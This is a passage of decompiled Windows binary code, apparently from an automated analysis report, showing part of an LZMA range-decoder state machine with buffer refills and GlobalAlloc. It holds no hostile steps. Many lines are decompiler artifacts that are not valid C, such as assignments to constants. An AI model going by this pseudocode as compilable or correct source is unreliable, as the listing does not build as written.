												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
